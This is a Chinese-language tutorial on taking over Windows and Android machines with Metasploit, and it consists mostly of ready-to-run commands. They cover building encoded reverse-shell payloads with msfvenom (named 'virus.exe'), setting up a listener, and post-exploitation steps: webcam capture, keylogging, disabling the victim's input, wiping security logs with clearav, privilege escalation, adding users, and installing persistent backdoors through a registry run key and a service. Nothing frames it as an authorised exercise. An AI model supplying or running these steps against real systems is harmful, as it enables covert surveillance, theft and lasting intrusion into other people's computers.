目的:使用matesploit模塊獲得win7權(quán)限
系統(tǒng):Kali,攻擊機:Kali掷倔,被攻擊電腦:Win7/Win10
1,生成遠控文件
Win系列:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 -f exe -o /root/Desktop/virus.exe -e x86/shikata_ga_nai -i 8
lhost:攻擊者ip
lport:攻擊者port
Android:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4444 R > /root/a.apk
2,Kali執(zhí)行msfconsole開始監(jiān)聽程序(Root模式下)
msfconsole
image.png
使用handler模塊
use exploit/multi/handler
image.png
設(shè)置攻擊負載
set payload windows/meterpreter/reverse_tcp
image.png
設(shè)置本地監(jiān)聽ip和端口
set LHOST 127.0.0.1
set LPORT 4444
image.png
最后上渴,將生成的.exe/.apk文件在windows/android上運行
在Kali上運行 run/exploit
image.png
成功得到權(quán)限
輸入shell冯袍,進入windows cmd模式
image.png
其他常用命令:
uictl開關(guān)鍵盤/鼠標
uictl [enable/disable] [keyboard/mouse/all] #開啟或禁止鍵盤/鼠標
uictl disable mouse #禁用鼠標
uictl disable keyboard #禁用鍵盤
網(wǎng)絡(luò)攝像頭攝像頭命令
webcam_list #查看攝像頭
webcam_snap #通過攝像頭拍照
webcam_stream #通過攝像頭開啟視頻
執(zhí)行執(zhí)行文件
execute #在目標機中執(zhí)行文件
execute -H -i -f cmd.exe # 創(chuàng)建新進程cmd.exe,-H不可見苍鲜,-i交互
遷移進程遷移
getpid # 獲取當(dāng)前進程的pid
ps # 查看當(dāng)前活躍進程
migrate <pid值> #將Meterpreter會話移植到指定pid值進程中
kill <pid值> #殺死進程
清除日志
clearav #清除windows中的應(yīng)用程序日志思灰、系統(tǒng)日志、安全日志
getsystem提權(quán)
getsystem
遠程桌面及截屏
enumdesktops #查看可用的桌面
getdesktop #獲取當(dāng)前meterpreter 關(guān)聯(lián)的桌面
set_desktop #設(shè)置meterpreter關(guān)聯(lián)的桌面 -h查看幫助
screenshot #截屏
use espia #或者使用espia模塊截屏 然后輸入screengrab
run vnc #使用vnc遠程桌面連接
getgui命令
run getgui –h #查看幫助
run getgui -e #開啟遠程桌面
run getgui -u lltest2 -p 123456 #添加用戶
run getgui -f 6661 –e #3389端口轉(zhuǎn)發(fā)到6661
鍵盤記錄
keyscan_start #開始鍵盤記錄
keyscan_dump #導(dǎo)出記錄數(shù)據(jù)
keyscan_stop #結(jié)束鍵盤記錄
后門植入
Metasploit的自帶的后門有兩種方式啟動的混滔,一種是通過啟動項啟動(持久性)洒疚,一種是通過服務(wù)啟動(metsvc),另外還可以通過persistence_exe自定義后門文件坯屿。
1)持久性啟動項后門
在C:\用戶*** \應(yīng)用程序數(shù)據(jù)\本地的\ Temp \目錄下油湖,上傳一個VBS腳本
在注冊表A. HKLM \軟件\微軟\的Windows \ CurrentVersion \運行\(zhòng)加入開機啟動項
run persistence –h #查看幫助
run persistence -X -i 5 -p 6661 -r 192.168.159.134
#-X指定啟動的方式為開機自啟動,-i反向連接的時間間隔(5s) –r 指定攻擊者的ip
image
連接后門
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 6661
msf > exploit
2)metsvc服務(wù)后門
在C:\用戶*** \應(yīng)用程序數(shù)據(jù)\本地\ TEMP \上傳了三個文件(metsrv.x86.dll领跛,metsvc-SERVER.EXE乏德,metsvc.exe),通過服務(wù)啟動吠昭,服務(wù)名為Meterpreter就會
run metsvc –h # 查看幫助
run metsvc –A #自動安裝后門
image
連接后門
msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.159.144
msf > set LPORT 31337
msf > exploit
然后喊括,開始你的冒險之旅吧!